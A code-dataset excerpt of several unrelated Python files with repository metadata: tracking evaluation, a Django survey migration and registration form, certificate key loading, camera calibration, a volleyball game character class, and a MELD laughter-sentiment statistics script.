# print('\nEvaluating camera ID: ', camera_id)
# aggregate_eval_results(
# summary_,
# metrics,
# list(track_acc.keys()),
# mh,
# generate_overall=True,
# class_average=class_average)
#
# print('\nEvaluating overall results...')
# summary = aggregate_eval_results(
# summary,
# metrics,
# list(track_acc.keys()),
# mh,
# generate_overall=True,
# class_average=class_average)
#
# print('Evaluation finsihes with {:.2f} s'.format(time.time() - t))
#
# out = {k: v for k, v in summary.to_dict().items()}
# return out
def tao_evaluation(tao_ann_file, anns, results_coco_format):
from tao.toolkit.tao import TaoEval
############################## debugging code to make sure we are using TaoEval correctly
############################## we pass the gt ann as predictions
# annos = anns['annotations']
# for ann in annos:
# ann['score'] = 1
# import logging
# logger = logging.getLogger()
# logger.setLevel(logging.INFO)
# tao_eval = TaoEval(tao_ann_file, annos)
# # tao_eval = TaoEval(tao_ann_file, annos[:len(annos)//2])
# import pdb;pdb.set_trace()
# tao_eval.run()
# tao_eval.print_results()
############################## end debugging code
# convert results from coco format to tao format
global_instance_id = 0
results_tao_format = []
for img, results_in_img in zip(anns['images'], results_coco_format):
img_id = img['id']
if img['frame_id'] == 0:
global_instance_id += 10000 # shift it 10000 to restart counting in next video
for instance_id, result in results_in_img.items():
instance_id = int(instance_id) + global_instance_id
result_tao_format = {
"image_id": img_id,
"category_id": result['label'] + 1, # coco labels are 1-based
"bbox": xyxy2xywh(result['bbox'][:-1]),
"score": result['bbox'][-1],
"track_id": instance_id,
"video_id": img['video_id'],
}
results_tao_format.append(result_tao_format)
import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
tao_eval = TaoEval(tao_ann_file, results_tao_format)
tao_eval.run()
tao_eval.print_results()
results = tao_eval.get_results()
return results
| 35.912921 | 101 | 0.551975 | 1,605 | 12,785 | 4.192523 | 0.187539 | 0.022292 | 0.009362 | 0.005944 | 0.265716 | 0.254718 | 0.215634 | 0.196314 | 0.178778 | 0.174469 | 0 | 0.012055 | 0.312241 | 12,785 | 355 | 102 | 36.014085 | 0.753213 | 0.382871 | 0 | 0.051429 | 0 | 0 | 0.077914 | 0 | 0 | 0 | 0 | 0 | 0.005714 | 1 | 0.034286 | false | 0 | 0.051429 | 0.005714 | 0.12 | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a299898b1c3a86c88536543a8e7bfba9ea1a930e | 6,027 | py | Python | encuestas/migrations/0004_auto_20180412_2056.py | CARocha/cafod-joa | e207b29375cd1f2219086b54ec6280e5c5789c32 | [
"MIT"
] | 1 | 2021-11-05T11:33:01.000Z | 2021-11-05T11:33:01.000Z | encuestas/migrations/0004_auto_20180412_2056.py | CARocha/cafod-joa | e207b29375cd1f2219086b54ec6280e5c5789c32 | [
"MIT"
] | 6 | 2020-06-05T18:13:39.000Z | 2022-01-13T00:45:03.000Z | encuestas/migrations/0004_auto_20180412_2056.py | CARocha/cafod-joa | e207b29375cd1f2219086b54ec6280e5c5789c32 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import multiselectfield.db.fields
class Migration(migrations.Migration):
dependencies = [
('encuestas', '0003_auto_20180406_0353'),
]
operations = [
migrations.AlterModelOptions(
name='distribucionupf',
options={'verbose_name_plural': 'Ditribuci\xf3n de la tierra en la UPF'},
),
migrations.RemoveField(
model_name='cultivosanuales',
name='area_cosechada',
),
migrations.RemoveField(
model_name='cultivoshuerto',
name='area_cosechada',
),
migrations.AlterField(
model_name='condicionesvida',
name='escolaridad',
field=models.IntegerField(choices=[(1, b'Ning\xc3\xban estudio'), (2, b'Primaria incompleta'), (3, b'Primaria completa'), (4, b'Secundaria incompleta'), (5, b'Secundaria completa (o bachiller)'), (6, b'carrera universitarios incompleta'), (7, b'carrera universitaria completa')]),
),
migrations.AlterField(
model_name='cultivos',
name='unidad_medida',
field=models.IntegerField(choices=[(1, b'Quintal(100kg)'), (2, b'Libras'), (3, b'Docena'), (4, b'Cien'), (5, b'Cabeza'), (6, b'Litro'), (7, b'Unidad'), (8, b'Kilo')]),
),
migrations.AlterField(
model_name='cultivosanuales',
name='consumo_animal',
field=models.FloatField(verbose_name=b'Semilla'),
),
migrations.AlterField(
model_name='cultivoshuerto',
name='consumo_animal',
field=models.FloatField(verbose_name=b'Semilla'),
),
migrations.AlterField(
model_name='cultivoshuertos',
name='unidad_medida',
field=models.IntegerField(choices=[(1, b'Quintal(100kg)'), (2, b'Libras'), (3, b'Docena'), (4, b'Cien'), (5, b'Cabeza'), (6, b'Litro'), (7, b'Unidad'), (8, b'Kilo')]),
),
migrations.AlterField(
model_name='detallemiembros',
name='cantidad_dependen',
field=models.IntegerField(verbose_name=b'1.5-\xc2\xbfCu\xc3\xa1ntas personas dependen economicamente del encuestado/a?'),
),
migrations.AlterField(
model_name='duenosi',
name='si',
field=models.IntegerField(choices=[(1, b'A nombre del hombre'), (2, b'A nombre de la mujer'), (3, b'A nombre de ambos'), (4, b'A nombre de los hijos'), (5, b'A nombre de los hijas'), (6, b'A nombre de padres'), (7, b'A nombre de otros')]),
),
migrations.AlterField(
model_name='escasezalimentos',
name='agricola',
field=multiselectfield.db.fields.MultiSelectField(blank=True, max_length=9, null=True, verbose_name=b'Razones agr\xc3\xadcolas', choices=[(b'A', b'Falta o perdida de semilla'), (b'B', b'Mala calidad de la semilla'), (b'C', b'Falta de riego'), (b'D', b'Poca Tierra o baja fertilidad'), (b'E', b'Plagas y enfermedades')]),
),
migrations.AlterField(
model_name='escasezalimentos',
name='considera',
field=models.IntegerField(verbose_name=b'4.4-Si no cuenta siempre con suficientes alimentos, indicar las principales razones', choices=[(1, b'Si'), (2, b'No')]),
),
migrations.AlterField(
model_name='escasezalimentos',
name='economica',
field=multiselectfield.db.fields.MultiSelectField(blank=True, max_length=7, null=True, verbose_name=b'Razones econ\xc3\xb3micas', choices=[(b'A', b'Bajo precio de sus productos agr\xc3\xadcolas en el mercado'), (b'B', b'Falta de mercado'), (b'C', b'Falta de credito'), (b'D', b'Falta de mano de obra')]),
),
migrations.AlterField(
model_name='escasezalimentos',
name='fenomeno',
field=multiselectfield.db.fields.MultiSelectField(blank=True, max_length=9, null=True, verbose_name=b'Fen\xc3\xb3menos naturales', choices=[(b'A', b'Sequ\xc3\xada'), (b'B', b'Inundaci\xc3\xb3n'), (b'C', b'Deslizamiento'), (b'D', b'Incendios'), (b'E', b'Heladas/Granizo')]),
),
migrations.AlterField(
model_name='frutas',
name='unidad_medida',
field=models.IntegerField(choices=[(1, b'Quintal(100kg)'), (2, b'Libras'), (3, b'Docena'), (4, b'Cien'), (5, b'Cabeza'), (6, b'Litro'), (7, b'Unidad'), (8, b'Kilo')]),
),
migrations.AlterField(
model_name='organizacionsocialproductiva',
name='cuales_beneficios',
field=models.ManyToManyField(to='encuestas.BeneficiosOrganizados', verbose_name=b'3.1.2-\xc2\xbfPor qu\xc3\xa9 decidi\xc3\xb3 integrar estas organizaciones?', blank=True),
),
migrations.AlterField(
model_name='seguridadalimentaria',
name='escasez',
field=multiselectfield.db.fields.MultiSelectField(blank=True, max_length=15, null=True, verbose_name=b'4.3-Qu\xc3\xa9 es lo que hace cuando hay escasez de alimentos en la familia', choices=[(b'A', b'Busca trabajo fuera de la UPF'), (b'B', b'Recibe remesas familiares'), (b'C', b'Se endeuda'), (b'D', b'Vende alg\xc3\xban bien'), (b'E', b'Pide donaci\xc3\xb3n de alimentos al estado o iglesia'), (b'F', b'Pide alimentos a familiares'), (b'G', b'Pasa hambre'), (b'H', b'Trueque de productos')]),
),
migrations.AlterField(
model_name='usosemilla',
name='compradas_agroservicio',
field=models.FloatField(verbose_name=b'4.5.2-Compradas en un agroservicio'),
),
migrations.AlterField(
model_name='usosemilla',
name='tipo_semilla',
field=multiselectfield.db.fields.MultiSelectField(blank=True, max_length=5, null=True, verbose_name=b'4.5.1-Tipos de semilla usadas en UPF', choices=[(b'A', b'Nativas'), (b'B', b'Acriolladas'), (b'C', b'Mejoradas/certificadas')]),
),
]
| 55.805556 | 505 | 0.612411 | 737 | 6,027 | 4.933514 | 0.303935 | 0.044554 | 0.110011 | 0.127613 | 0.418867 | 0.405391 | 0.261001 | 0.261001 | 0.261001 | 0.209021 | 0 | 0.023907 | 0.229633 | 6,027 | 107 | 506 | 56.327103 | 0.759207 | 0.003484 | 0 | 0.584158 | 0 | 0.019802 | 0.349434 | 0.025316 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.029703 | 0 | 0.059406 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a299c702e5812c968bd896561ae3de285029c637 | 940 | py | Python | site/user/forms.py | paulohenriquerosa/gnss-iot-server | 6e7ff39bc83276d6ad86121083eb48d134d00f9d | [
"MIT"
] | 1 | 2019-10-16T01:44:06.000Z | 2019-10-16T01:44:06.000Z | site/user/forms.py | paulohenriquerosa/gnss-iot-server | 6e7ff39bc83276d6ad86121083eb48d134d00f9d | [
"MIT"
] | 3 | 2019-05-30T22:09:43.000Z | 2020-01-10T01:03:24.000Z | site/user/forms.py | paulohenriquerosa/gnss-iot-server | 6e7ff39bc83276d6ad86121083eb48d134d00f9d | [
"MIT"
] | 3 | 2019-02-25T22:35:47.000Z | 2020-05-24T09:41:10.000Z | from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django import forms
class RegisterForm(UserCreationForm):
email = forms.EmailField(label="Email", required=True,
help_text='Required. Inform a valid email address.')
name = forms.CharField(label="Name", required=True)
class Meta:
model = User
fields = ('username','name', 'email')
def clean_email(self, *args, **kwargs):
email = self.cleaned_data['email']
if User.objects.filter(email=email):
raise forms.ValidationError('Email already exists.')
else:
return email
def save_all(self, commit=True):
user = super(RegisterForm, self).save(commit=False)
user.name = self.cleaned_data['name']
user.email = self.cleaned_data['email']
if commit:
user.save()
return user | 30.322581 | 81 | 0.629787 | 108 | 940 | 5.425926 | 0.453704 | 0.051195 | 0.076792 | 0.071672 | 0.09215 | 0.09215 | 0 | 0 | 0 | 0 | 0 | 0 | 0.259574 | 940 | 31 | 82 | 30.322581 | 0.841954 | 0 | 0 | 0 | 0 | 0 | 0.10627 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.130435 | 0 | 0.478261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a299d314e785da5a3ee9a2279edb7558bf1e0ecf | 1,399 | py | Python | lz_hub/lz_hub_certbag.py | Lennerados/lazarus | 20b116bb279f097655715ee0811167bc3bbdb3fb | [
"Apache-2.0"
] | 1 | 2022-02-23T13:06:47.000Z | 2022-02-23T13:06:47.000Z | lz_hub/lz_hub_certbag.py | Lennerados/lazarus | 20b116bb279f097655715ee0811167bc3bbdb3fb | [
"Apache-2.0"
] | 1 | 2022-01-19T12:49:27.000Z | 2022-01-19T12:49:27.000Z | lz_hub/lz_hub_certbag.py | Lennerados/lazarus | 20b116bb279f097655715ee0811167bc3bbdb3fb | [
"Apache-2.0"
] | 4 | 2021-12-09T13:21:43.000Z | 2022-01-29T09:24:15.000Z | #!/usr/bin/env python3
import ecdsa
import struct
import hashlib
import OpenSSL
import open_ssl_wrapper as osw
count = 0
class hub_certbag:
def __init__(self, cert_path):
self.cert_path = cert_path
self.hub_cert = None
self.hub_sk = None
self.hub_sk_ecdsa = None
def load(self):
self.hub_cert = osw.load_cert(self.cert_path + "/hub_cert.pem")
if self.hub_cert is None:
return False
self.hub_sk = osw.load_privatekey(self.cert_path + "/hub_sk.pem")
if self.hub_sk is not None:
tmp = OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_ASN1, self.hub_sk)
self.hub_sk_ecdsa = ecdsa.SigningKey.from_der(tmp, hashfunc=hashlib.sha256)
else:
return False
return True
def print_pub_key(self, cert):
tmp = ecdsa.VerifyingKey.from_pem(osw.dump_publickey(cert.get_pubkey()))
pubkey = struct.pack('B64s', 0x4, ecdsa.VerifyingKey.to_string(tmp))
print("key: %s" %("".join("{:02x} ".format(x) for x in pubkey[:20])))
def print_data(data, info):
try:
print("%s: %s" %(info, "".join("{:02x} ".format(x) for x in data)))
except Exception as e:
print("WARN: Could not print data - %s" %str(e))
def test():
cert_path = "/home/simon/repos/lazarus/lz_hub/certificates"
cb = hub_certbag(cert_path)
cb.load() | 29.145833 | 91 | 0.635454 | 205 | 1,399 | 4.136585 | 0.404878 | 0.074292 | 0.063679 | 0.03066 | 0.04717 | 0.04717 | 0.04717 | 0 | 0 | 0 | 0 | 0.015009 | 0.238027 | 1,399 | 48 | 92 | 29.145833 | 0.780488 | 0.015011 | 0 | 0.055556 | 0 | 0 | 0.095065 | 0.032656 | 0 | 0 | 0.002177 | 0 | 0 | 1 | 0.138889 | false | 0 | 0.138889 | 0 | 0.388889 | 0.138889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a29dc8a60f789df2afe413d065850ad69819ef71 | 1,639 | py | Python | calibration/mm2pix.py | JaledMC/utils | 284a980f56cc36f9f8c69e650386e3ce771de565 | [
"MIT"
] | null | null | null | calibration/mm2pix.py | JaledMC/utils | 284a980f56cc36f9f8c69e650386e3ce771de565 | [
"MIT"
] | 2 | 2020-03-01T02:54:09.000Z | 2020-03-16T09:50:48.000Z | calibration/mm2pix.py | JaledMC/utils | 284a980f56cc36f9f8c69e650386e3ce771de565 | [
"MIT"
] | null | null | null | import cv2
from chessCalibrate import calculate_matrix
points = []
def button_call(event, x, y, flags, param):
global points
if event == cv2.EVENT_LBUTTONDBLCLK:
if len(points) == 1:
points.append((x, y))
print("X pixels: ", abs(points[0][0] - points[1][0]))
print("Y pixels: ", abs(points[0][1] - points[1][1]))
else:
points = [(x, y)]
def drawing(image, points, color=(255, 0, 0), thick=10):
for point in points:
cv2.circle(image, point, thick, color, -1)
if len(points) == 2:
cv2.line(image, points[0], points[1], color, thick)
return image
def setup_matrix(path, image):
ret, mtx, dist, rvecs, tvecs = calculate_matrix(path)
h, w = image.shape[:2]
newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (w, h), 1, (w, h))
return newcameramtx, roi, mtx, dist
def undistort(frame, newcameramtx, roi, mtx, dist):
dst = cv2.undistort(frame, mtx, dist, None, newcameramtx)
x, y, w, h = roi
return dst[y:y+h, x:x+w]
def main():
src = cv2.VideoCapture(2)
cv2.namedWindow('frame')
cv2.setMouseCallback('frame', button_call)
_, frame = src.read()
newcameramtx, roi, mtx, dist = setup_matrix("CornersDetected", frame)
while True:
ret, frame = src.read()
frame = undistort(frame, newcameramtx, roi, mtx, dist)
frame = drawing(frame, points)
cv2.imshow('frame', frame)
key = cv2.waitKey(20)
if key == 27: # Esc key to exit
break
src.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
| 27.779661 | 83 | 0.597315 | 219 | 1,639 | 4.39726 | 0.351598 | 0.050883 | 0.074766 | 0.091381 | 0.074766 | 0.074766 | 0 | 0 | 0 | 0 | 0 | 0.031993 | 0.256254 | 1,639 | 58 | 84 | 28.258621 | 0.757998 | 0.009152 | 0 | 0 | 0 | 0 | 0.035758 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.044444 | 0 | 0.222222 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a29dd6241a46c1dbe6b1a834f3b9003085854ec5 | 8,247 | py | Python | src/Game/character.py | MiguelReuter/Volley-ball-game | 67d830cc528f3540b236d8191f582adb1827dbde | [
"MIT"
] | 4 | 2019-04-15T20:39:29.000Z | 2022-02-04T10:51:37.000Z | src/Game/character.py | MiguelReuter/Volley-ball-game | 67d830cc528f3540b236d8191f582adb1827dbde | [
"MIT"
] | null | null | null | src/Game/character.py | MiguelReuter/Volley-ball-game | 67d830cc528f3540b236d8191f582adb1827dbde | [
"MIT"
] | 1 | 2019-11-30T01:05:29.000Z | 2019-11-30T01:05:29.000Z | # encoding : UTF-8
from Engine.Display import debug3D_utils
from Engine.Collisions import AABBCollider
from Settings import *
import pygame as pg
from math import sqrt
from Engine.Actions import ActionObject
from Game.character_states import *
class Character(ActionObject):
def __init__(self, position=None, player_id=PlayerId.PLAYER_ID_1, max_velocity=None, jump_velocity=None):
ActionObject.__init__(self, player_id)
self._position = Vector3(position) if position is not None else Vector3()
self.previous_position = Vector3(self._position)
self.w = CHARACTER_W
self.h = CHARACTER_H
self.collider_relative_position = Vector3()
self.collider = None
self.is_colliding_ball = False
self.max_velocity = max_velocity if max_velocity is not None else RUN_SPEED # m/s
self.jump_velocity = jump_velocity if jump_velocity is not None else JUMP_VELOCITY # m/s
self.velocity = Vector3()
self.direction = Vector3()
self.team = Team()
self.state = Idling(self)
self.set_default_collider()
# sprite
self.rect = pg.Rect(0, 0, 0, 0)
self.rect_shadow = pg.Rect(0, 0, 0, 0)
@property
def position(self):
return self._position
@position.setter
def position(self, value):
self._position = value
self.collider.center = self._position + self.collider_relative_position
def draw_debug(self):
prev_rect = self.rect
prev_shadow_rect = self.rect_shadow
ground_pos = Vector3(self.position)
ground_pos.z = 0
self.rect_shadow = debug3D_utils.draw_horizontal_ellipse(ground_pos, self.w / 2)
self.rect = self.collider.draw_debug()
return [prev_shadow_rect.union(self.rect_shadow), prev_rect.union(self.rect)]
def move_rel(self, dxyz, free_displacement=FREE_DISPLACEMENT):
"""
Move object with a certain displacement.
:param pygame.Vector3 dxyz: displacement
:param bool free_displacement: True if displacement will be not limited on court
:return: None
"""
self.position += Vector3(dxyz)
if not free_displacement:
self.limit_displacement_on_court()
def move(self, direction, dt, free_displacement=FREE_DISPLACEMENT):
"""
Move object along a specified direction and amount of time.
The amplitude of displacement is dependant from :
- :var direction: magnitude
- :var self.max_velocity:
- :var dt:
:param pygame.Vector3 direction: direction of displacement
:param float dt: amount of time in ms. Usually, dt is the time between 2 frames
:param bool free_displacement: True if displacement will be not limited on court
:return: None
"""
dxyz = 0.001 * dt * direction * self.max_velocity
self.move_rel(dxyz, free_displacement)
def limit_displacement_on_court(self):
"""
Limit displacement on court. Called by move_rel method.
:return: None
"""
new_pos = self.position
# net
if self.team.id == TeamId.LEFT:
if self.collider.get_bound_coords(axis=1, m_to_p=True) + self.collider_relative_position.y > 0:
new_pos.y = -self.collider.size3.y / 2 - self.collider_relative_position.y
else:
if self.collider.get_bound_coords(axis=1, m_to_p=False) + self.collider_relative_position.y < 0:
new_pos.y = self.collider.size3.y / 2 - self.collider_relative_position.y
# out of court
f = 1.5
game_engine = Engine.game_engine.GameEngine.get_instance()
court = game_engine.court
if self.team.id == TeamId.LEFT:
new_pos.y = max(-f * court.w / 2, new_pos.y)
else:
new_pos.y = min(f * court.w / 2, new_pos.y)
new_pos.x = max(-f * court.h / 2, new_pos.x)
new_pos.x = min(f * court.h / 2, new_pos.x)
self.position = new_pos
def update_actions(self, action_events, **kwargs):
dt = kwargs["dt"] if "dt" in kwargs.keys() else 0
filtered_action_events = self.filter_action_events_by_player_id(action_events)
# state machine :
# run current state
self.state.run(filtered_action_events, dt=dt)
# eventually switch state
self.state = self.state.next(filtered_action_events, dt=dt)
def update_physics(self, dt, free_displacement=FREE_DISPLACEMENT):
self.previous_position = Vector3(self.position)
self.velocity += Vector3(0, 0, -0.001 * dt * G)
self.move_rel(0.001 * dt * self.velocity, free_displacement)
def get_hands_position(self):
"""
Return hands position of character in world coordinates.
:return: hands position
:rtype pygame.Vector3:
"""
dh = Vector3(0, 0, self.h)
dh.y = self.w / 2
if not self.team.id == TeamId.LEFT:
dh.y *= -1
return self.position + dh
def set_default_collider(self):
"""
Set default AABB Collider.
:return: None
"""
self.collider_relative_position = Vector3(0, 0, self.h / 2)
collider_size3 = Vector3(self.w, self.w, self.h)
self.collider = AABBCollider(self._position + self.collider_relative_position, collider_size3)
def set_diving_collider(self, direction):
"""
Set AABB Collider during diving.
:param pygame.Vector3 direction: direction of diving
:return: None
"""
dive_direction = Vector3(direction)
collider_size3 = Vector3()
collider_size3.x = max(self.w, self.h * abs(dive_direction.x))
collider_size3.y = max(self.w, self.h * abs(dive_direction.y))
collider_size3.z = self.w
collider_rel_center = Vector3(self.h / 2 * dive_direction.x,
self.h / 2 * dive_direction.y,
self.w / 2)
if dive_direction.x < 0:
collider_rel_center.x += self.w / 2
elif dive_direction.x > 0:
collider_rel_center.x -= self.w / 2
if dive_direction.y < 0:
collider_rel_center.y += self.w / 2
elif dive_direction.y > 0:
collider_rel_center.y -= self.w / 2
self.collider_relative_position = collider_rel_center
self.collider = AABBCollider(self._position + self.collider_relative_position, collider_size3)
def reset(self):
self.set_default_collider()
self.velocity = Vector3()
def is_state_type_of(self, state_type):
return self.state.__class__.type == state_type
def get_time_to_run_to(self, target_position, origin_pos=None):
"""
Give time that takes character by running from an origin to a target position.
Time is processed with displacements in 8 possible directions.
:param pygame.Vector3 target_position: target position
:param pygame.Vector3 origin_pos: origin position. Current character position is default value.
:return: given time in sec
:rtype: float
"""
if origin_pos is None:
origin_pos = self.position
# absolute delta position
delta_pos = target_position - origin_pos
delta_pos = Vector3([abs(delta_pos[i]) for i in (0, 1, 2)])
# diagonal travel
dist_on_each_axis = min(delta_pos.x, delta_pos.y)
diagonal_time = 1.4142 * dist_on_each_axis / self.max_velocity
# orthogonal travel
direct_time = (max(delta_pos.x, delta_pos.y) - dist_on_each_axis) / self.max_velocity
return diagonal_time + direct_time
def get_time_to_jump_to_height(self, h):
"""
Give time that takes the top of character reaches a specific height by jumping.
Given time is processed in ascending phase.
:param float h: height at which time is given
:return: given time is sec or None if there is no solution
:rtype: float or None
"""
# at t=t1, self.position.z(0) + self.h = h
# -G / 2 * t1**2 + self.jump_velocity * t1 + self.h - h = 0
a, b, c = -G/2, self.jump_velocity, self.h - h
delta = b**2 - 4 * a * c
if delta >= 0:
return (-b + sqrt(delta)) / (2 * a) #
else:
return None
def get_max_height_jump(self):
"""
Give max height reached by top of character by jumping.
:return: max height reached
:rtype: float
"""
a, b, c = -G/2, self.jump_velocity, self.h
delta = b**2 - 4 * a * c
return -delta / (4 * a)
class Team:
def __init__(self, team_id=TeamId.NONE, characters_list=None):
self.characters = characters_list
self.score = 0
self.id = team_id
self.set_team_to_characters()
def reset(self, **kwargs):
k = kwargs.keys()
self.characters = kwargs["characters"] if "characters" in k else None
self.set_team_to_characters()
self.score = kwargs["score"] if "score" in k else 0
self.id = kwargs["score"] if "score" in k else TeamId.NONE
def add_score(self, val=1):
self.score += val
def set_team_to_characters(self):
if self.characters is not None:
for ch in self.characters:
ch.team = self | 30.208791 | 106 | 0.716503 | 1,272 | 8,247 | 4.451258 | 0.167453 | 0.040268 | 0.035323 | 0.049452 | 0.338573 | 0.249912 | 0.193748 | 0.145178 | 0.134935 | 0.134935 | 0 | 0.017862 | 0.17861 | 8,247 | 273 | 107 | 30.208791 | 0.817981 | 0.228204 | 0 | 0.102041 | 0 | 0 | 0.007077 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.047619 | 0.013605 | 0.258503 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a29e9157735b72b6a5d4b35ad2209e9c8960ef8a | 8,037 | py | Python | statistics/count_laughter_from_trainsentemocsv.py | hikaruya8/dimotion | 68c1e561e2d26f49ada59a82ed9faae373718033 | [
"MIT"
] | null | null | null | statistics/count_laughter_from_trainsentemocsv.py | hikaruya8/dimotion | 68c1e561e2d26f49ada59a82ed9faae373718033 | [
"MIT"
] | null | null | null | statistics/count_laughter_from_trainsentemocsv.py | hikaruya8/dimotion | 68c1e561e2d26f49ada59a82ed9faae373718033 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import numpy as np
import os
import pickle
import glob
import re
import pprint
import pandas as pd
detected_folder = '../laughter-detection/detected_train_lauthter/' # checked folder if laughter is detected. it contains detected and also undeted folder
# laughter_file = 'dia991_utt7/'
df = pd.read_csv('../MELD/data/MELD/train_sent_emo.csv', header=0)
# video_utterances = meld_features[5]
# emotion_labels = meld_features[2]#emotion labels:{'neutral': 0, 'surprise': 1, 'fear': 2, 'sadness': 3, 'joy': 4, 'disgust': 5, 'anger': 6}
# sentiment_labels = meld_features[8] #sentiment labels: {'neutral': 0, 'positive': 1, 'negative': 2}
sample = df[(df['Dialogue_ID'] == 0) & (df['Utterance_ID'] == 3)] # sample DialogueID && UtteranceID
sample_utterance = sample['Utterance'].values.tolist() # sample utterance
def functor(f, l): # change str to int function
if isinstance(l,list):
return [functor(f,i) for i in l]
else:
return f(l)
# # change to list
# utterance_lists = list(video_utterances.values())
# emotion_label_lists = list(emotion_labels.values())
# sentiment_label_lists = list(sentiment_labels.values())
# sentiment_label_lists_np = np.array(sentiment_label_lists)
# get detected laughter index
laughter_file_path = glob.glob(detected_folder + '*/laugh_0.wav')
laughter_file = [os.path.basename(os.path.dirname(l)) for l in laughter_file_path]
laughter_index = [l.replace('dia', '').replace('utt','').split('_', 1) for l in laughter_file]
laughter_index = functor(int, laughter_index) # laughter_index = [dialogue_index, utterance_index in dialogue]
laughter_index= sorted(laughter_index, key=lambda x: x[0])
# hold current utterance sentiment & previous utterance sentiment
current_neutral = 0
current_positive = 0
current_negative = 0
previous_neutral = 0
previous_positive = 0
previous_negative = 0
# emotion
# label index mapping = {'neutral': 0, 'surprise': 1, 'fear': 2, 'sadness': 3, 'joy': 4, 'disgust': 5, 'anger': 6}
# current emotion sum
current_neu = 0
current_sur = 0
current_fea = 0
current_sad = 0
current_joy = 0
current_dis = 0
current_ang = 0
# previous emotion sum
pre_neu = 0
pre_sur = 0
pre_fea = 0
pre_sad = 0
pre_joy = 0
pre_dis = 0
pre_ang = 0
# check index error sum
indexerror_sum = 0
for i, l in enumerate(laughter_index):
dia_index = l[0]
utt_index = l[1]
current_df = df[(df['Dialogue_ID'] == dia_index) & (df['Utterance_ID'] == utt_index)]
current_utt = current_df['Utterance'].values.tolist()
current_senti = current_df['Sentiment'].values.tolist()
current_emo = current_df['Emotion'].values.tolist()
try:
if current_senti == ['neutral']:
current_neutral += 1
elif current_senti == ['positive']:
current_positive += 1
elif current_senti == ['negative']:
current_negative += 1
else:
pass
# label index mapping = {'neutral': 0, 'surprise': 1, 'fear': 2, 'sadness': 3, 'joy': 4, 'disgust': 5, 'anger': 6}
if current_emo == ['neutral']:
current_neu += 1
elif current_emo == ['surprise']:
current_sur += 1
elif current_emo == ['fear']:
current_fea += 1
elif current_emo == ['sadness']:
current_sad += 1
elif current_emo == ['joy']:
current_joy += 1
elif current_emo == ['disgust']:
current_dis += 1
elif current_emo == ['anger']:
current_ang += 1
else:
pass
# check previous sentiment
if utt_index > 0:
previous_df = df[(df['Dialogue_ID'] == dia_index) & (df['Utterance_ID'] == (utt_index-1))]
pre_utt = previous_df['Utterance'].values.tolist()
pre_senti = previous_df['Sentiment'].values.tolist()
pre_emo = previous_df['Emotion'].values.tolist()
if pre_senti == ['neutral']:
previous_neutral += 1
elif pre_senti == ['positive']:
previous_positive += 1
elif pre_senti== ['negative']:
previous_negative += 1
else:
pass
# check previous emotion
if pre_emo == ['neutral']:
pre_neu += 1
elif pre_emo == ['surprise']:
pre_sur += 1
elif pre_emo== ['fear']:
pre_fea += 1
elif pre_emo == ['sadness']:
pre_sad += 1
elif pre_emo == ['joy']:
pre_joy += 1
elif pre_emo == ['disgust']:
pre_dis += 1
elif pre_emo == ['anger']:
pre_ang += 1
else:
pass
else:
pass
except IndexError:
indexerror_sum += 1
except IndexError:
indexerror_sum += 1
print('***IndexEroor***')
def whole_senti_graph():
[neutral, positive, negative] = [4710, 2334, 2945]
X = np.array(['neutral', 'positive', 'negative'])
Y = np.array([neutral, positive, negative])
plt.title('Sentiment in Whole Utterance')
plt.pie(Y, labels=X, counterclock=False, startangle=90, autopct="%1.1f%%")
plt.show()
def whole_emo_graph():
[neutral, surprise, fear, sadness, joy, disgust, anger] = [4710, 1205, 268, 683, 1743, 271, 1109]
X = np.array(['neutral', 'surprise', 'fear', 'sadness', 'joy', 'disgust', 'anger'])
Y = np.array([neutral, surprise, fear, sadness, joy, disgust, anger])
plt.title('Emotion in Whole Utterances')
